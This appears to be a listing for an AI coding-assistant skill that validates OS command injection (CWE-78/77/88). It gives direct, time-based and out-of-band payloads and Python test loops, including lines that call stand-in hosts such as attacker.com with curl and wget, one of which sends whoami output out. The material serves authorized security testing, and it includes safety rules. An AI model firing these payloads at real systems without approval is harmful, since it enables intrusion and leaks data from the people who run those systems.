command-injection-testing
Validate OS Command Injection vulnerabilities including direct command injection, blind command injection via time delays, and out-of-band command execution. Test by injecting shell metacharacters and commands into user-controlled inputs. Use when testing CWE-78 (OS Command Injection), CWE-77 (Command Injection), CWE-88 (Argument Injection), or related command execution vulnerabilities.
Installation
Details
Usage
After installing, this skill will be available to your AI coding assistant.
Verify installation:
npx agent-skills-cli listSkill Instructions
name: command-injection-testing description: Validate OS Command Injection vulnerabilities including direct command injection, blind command injection via time delays, and out-of-band command execution. Test by injecting shell metacharacters and commands into user-controlled inputs. Use when testing CWE-78 (OS Command Injection), CWE-77 (Command Injection), CWE-88 (Argument Injection), or related command execution vulnerabilities. allowed-tools: Read, Write, Bash
Command Injection Testing Skill
Purpose
Validate command injection vulnerabilities by injecting shell metacharacters and OS commands into user-controlled inputs and observing:
- Direct output of command execution in response
- Time-based delays indicating blind command execution
- Out-of-band callbacks (DNS/HTTP) confirming execution
- Error messages revealing command parsing
- File system changes from injected commands
Vulnerability Types Covered
1. Direct OS Command Injection (CWE-78)
Inject commands that execute and return output in the response.
Detection Methods:
- Inject
; idor| whoamiand observe command output - Inject
& dir(Windows) and observe directory listing - Look for shell command results in response body
Example Payloads:
; id
| whoami
`id`
$(whoami)
& dir
| type C:\windows\win.ini
2. Blind Command Injection - Time-Based (CWE-78)
Inject time-delay commands when output is not reflected.
Detection Methods:
- Inject
; sleep 5and measure response delay - Inject
| ping -c 5 127.0.0.1and measure delay - Inject
& timeout /t 5(Windows) and measure delay
Example Payloads:
; sleep 5
| sleep 5
`sleep 5`
$(sleep 5)
& ping -c 5 127.0.0.1
& timeout /t 5 (Windows)
| ping -n 5 127.0.0.1 (Windows)
3. Blind Command Injection - Out-of-Band (CWE-78)
Confirm execution via external DNS/HTTP callbacks.
Detection Methods:
- Inject
; curl http://attacker.com/callback - Inject
; nslookup attacker.com - Inject
| wget http://attacker.com/?data=$(whoami) - Monitor callback server for requests
Example Payloads:
; curl http://collaborator.com/
; nslookup collaborator.com
; wget http://collaborator.com/?d=$(whoami)
| ping collaborator.com
$(curl http://collaborator.com/$(whoami))
4. Argument Injection (CWE-88)
Inject additional arguments to existing commands.
Detection Methods:
- Inject
--helpor-vto trigger help/version output - Inject
--output=/tmp/testto write files - Inject arguments that modify command behavior
Example Payloads:
--help
--version
-v
--output=/tmp/test
-o /tmp/test
5. Command Injection via Different Contexts
Shell Metacharacters:
| Character | Unix/Linux | Windows | Description |
|---|---|---|---|
; | ✓ | ✗ | Command separator |
| ` | ` | ✓ | ✓ |
| ` | ` | ✓ | |
& | ✓ | ✓ | Background (Unix) / Separator (Win) |
&& | ✓ | ✓ | AND - execute if previous succeeds |
` | ✓ | ✗ | Command substitution (backticks) |
$() | ✓ | ✗ | Command substitution |
> | ✓ | ✓ | Redirect output |
< | ✓ | ✓ | Redirect input |
\n | ✓ | ✗ | Newline (command separator) |
Platform-Specific Notes
| Platform | Shell | Time Delay | Callback | Notes |
|---|---|---|---|---|
| Linux/Unix | bash/sh | sleep 5 | curl, wget, nslookup | Most metacharacters work |
| Windows | cmd.exe | timeout /t 5, ping -n 5 127.0.0.1 | nslookup, certutil | Limited metacharacters |
| Windows | PowerShell | Start-Sleep -s 5 | Invoke-WebRequest | Different syntax |
| macOS | zsh/bash | sleep 5 | curl, nslookup | Similar to Linux |
Prerequisites
- Target application that executes OS commands with user input
- Identified injection points (parameters, headers, file uploads, filenames)
- For blind testing: controlled callback server (collaborator domain)
- VULNERABILITIES.json with suspected command injection findings if provided
Testing Methodology
Phase 1: Identify Injection Points
Common injection vectors:
- URL parameters passed to system commands
- File upload filenames (often passed to file utilities)
- User-Agent/Referer headers (sometimes logged via shell)
- PDF generators, image processors, file converters
- Network utilities (ping, traceroute, nslookup forms)
- Git/SVN operations, backup tools
- Email functionality (often uses sendmail)
Phase 2: Establish Baseline
- Send normal request; record response content, status, and timing
- Note any error messages or command-related output
- Identify target OS from response headers, errors, or behavior
Phase 3: Execute Command Injection Tests
Direct Command Injection:
payloads = ["; id", "| whoami", "`id`", "$(whoami)"]
for payload in payloads:
resp = get(f"/ping?host=127.0.0.1{payload}")
if "uid=" in resp.text or "root" in resp.text:
status = "VALIDATED"
Time-Based Blind Command Injection:
baseline_time = measure_response("/ping?host=127.0.0.1")
payloads = ["; sleep 5", "| sleep 5", "`sleep 5`", "$(sleep 5)"]
for payload in payloads:
start = time.time()
resp = get(f"/ping?host=127.0.0.1{payload}")
elapsed = time.time() - start
if elapsed > baseline_time + 4.5:
status = "VALIDATED"
Out-of-Band Command Injection:
callback = "unique-id.collaborator.com"
payloads = [
f"; nslookup {callback}",
f"| curl http://{callback}/",
f"`nslookup {callback}`",
]
for payload in payloads:
post("/convert", data={"filename": f"test.pdf{payload}"})
if collaborator_received_dns_or_http():
status = "VALIDATED"
Windows-Specific Testing:
payloads = [
"& dir",
"| type C:\\windows\\win.ini",
"& timeout /t 5",
"| ping -n 5 127.0.0.1",
]
Phase 4: Classification Logic
| Status | Meaning |
|---|---|
| VALIDATED | Command output visible, time delay confirmed, or OOB callback received |
| FALSE_POSITIVE | Input properly escaped/sanitized, no execution indicators |
| PARTIAL | Some metacharacters blocked but others pass through |
| UNVALIDATED | Blocked by WAF, error, or insufficient evidence |
Validation Criteria:
- Command output (e.g.,
uid=,root:, directory listings) appears in response - Response time increases by expected delay duration (±0.5s tolerance)
- DNS/HTTP callback received from target server
- Error messages reveal shell command syntax
Phase 5: Capture Evidence
Capture minimal structured evidence (redact PII/secrets, truncate to 8KB, hash full response):
status,injection_type,cwe- Baseline request (url, method, status, response_time)
- Test request (url, method, status, response_time, payload)
- Command output snippet or callback details
- Platform detected (Linux/Windows)
Phase 6: Safety Rules
- Detection-only payloads; use benign commands (
id,whoami,hostname,sleep) - NEVER use destructive commands (
rm,del,format,shutdown) - NEVER exfiltrate sensitive data; use callbacks only to confirm execution
- Prefer time-based over OOB when possible (less network impact)
- Use minimal sleep durations (5 seconds max)
- Stop immediately if unexpected behavior or server impact detected
Output Guidelines
- Keep responses concise (1-4 sentences)
- Include endpoint, payload, detection method, and impact
Validated examples:
Direct command injection on /ping - ; id payload returned uid=33(www-data) (CWE-78). Full RCE possible.
Blind command injection on /convert - sleep 5 caused 5.2s delay (CWE-78). Time-based blind confirmed.
OOB command injection on /export - nslookup callback received (CWE-78). Command execution confirmed.
Argument injection on /backup - --help revealed rsync options (CWE-88). Command behavior modifiable.
Unvalidated example:
Command injection test incomplete on /api/exec - all metacharacters appear escaped. Evidence: path/to/evidence.json
CWE Mapping
Primary CWEs (DAST-testable):
-
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
- This is THE designated CWE for OS command injection
- Alternate terms: Shell injection, Shell metacharacters, OS Command Injection
- High likelihood of exploit per MITRE
-
CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
- Parent class covering command injection in general
- Includes non-OS command contexts (e.g., mail commands, LDAP)
-
CWE-88: Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
- Injecting arguments to existing commands
- CanAlsoBe relationship with CWE-78
Parent/Related CWEs (context):
- CWE-74: Improper Neutralization of Special Elements in Output ('Injection') — grandparent class
- CWE-20: Improper Input Validation — related root cause
- CWE-116: Improper Encoding or Escaping of Output — related mitigation failure
Related Attack Patterns:
- CAPEC-88: OS Command Injection
- CAPEC-15: Command Delimiters
- CAPEC-6: Argument Injection
- CAPEC-108: Command Line Execution through SQL Injection (chained)
OWASP Classification:
- OWASP Top Ten 2021: A03 - Injection
Notable CVEs (examples)
- CVE-2024-46256 (Nginx Proxy Manager): Command injection via Let's Encrypt certificate feature (CVSS 9.8).
- CVE-2024-3400 (Palo Alto PAN-OS): Pre-auth command injection in GlobalProtect leading to RCE.
- CVE-2023-1389 (TP-Link Archer AX21): Command injection via web management interface, widely exploited.
- CVE-2023-46747 (F5 BIG-IP): Authentication bypass + command injection leading to RCE.
- CVE-2022-42475 (FortiOS): Heap overflow with command injection in SSL-VPN.
- CVE-2021-22205 (GitLab): Command injection via image processing (ExifTool).
- CVE-2021-44228 (Log4Shell): While JNDI injection, enables command execution via LDAP.
- CVE-2019-19781 (Citrix ADC): Path traversal + command injection leading to RCE.
Safety Reminders
- ONLY test against user-approved targets; stop if production protections trigger
- Use benign, non-destructive commands only (
id,whoami,hostname,sleep,ping) - NEVER use
rm,del,format,shutdown, or any destructive command - OOB callbacks only to domains you control
- Prefer time-based detection over command output when possible
- Use input validation, parameterization, and avoid shell execution in mitigations
Reference Implementations
- See
reference/cmdi_payloads.pyfor command injection payloads by platform and detection type - See
reference/validate_cmdi.pyfor command injection validation flow - See
examples.mdfor concrete command injection scenarios and evidence formats
Additional Resources
More by anshumanbh
View allIdentify agentic AI security threats based on OWASP Top 10 for Agentic Applications 2026. Use when analyzing AI agents, LLM-powered applications, chatbots, auto-reply systems, tool-using AI, browser automation, sandbox execution, or any application that uses AI/LLM APIs (Anthropic, OpenAI, Claude, GPT) to process user input and take actions.
Validate SQL injection vulnerabilities (including blind SQLi) across time-based, error-based, boolean-based, UNION-based, stacked-query, and out-of-band patterns. Use when testing CWE-89 (SQL Injection), CWE-564 (Hibernate SQL Injection), and related SQL injection classes across MySQL, PostgreSQL, MSSQL, Oracle, and SQLite targets.
Validate Cross-Site Scripting (XSS) vulnerabilities including Reflected, Stored, and DOM-based XSS. Test by injecting script payloads into user-controlled inputs and observing if they execute in browser context. Use when testing CWE-79 (XSS), CWE-80 (Basic XSS), CWE-81 (Error Message XSS), CWE-83 (Attribute XSS), CWE-84 (URI Scheme XSS), CWE-85 (Doubled Character XSS), CWE-86 (Invalid Character XSS), CWE-87 (Alternate XSS Syntax), or related XSS findings.
Validate NoSQL injection vulnerabilities across MongoDB, Cassandra, CouchDB, Redis, and other NoSQL databases. Test operator injection, JavaScript injection, and query manipulation patterns. Use when testing CWE-943 (Improper Neutralization of Special Elements in Data Query Logic) and related NoSQL injection classes.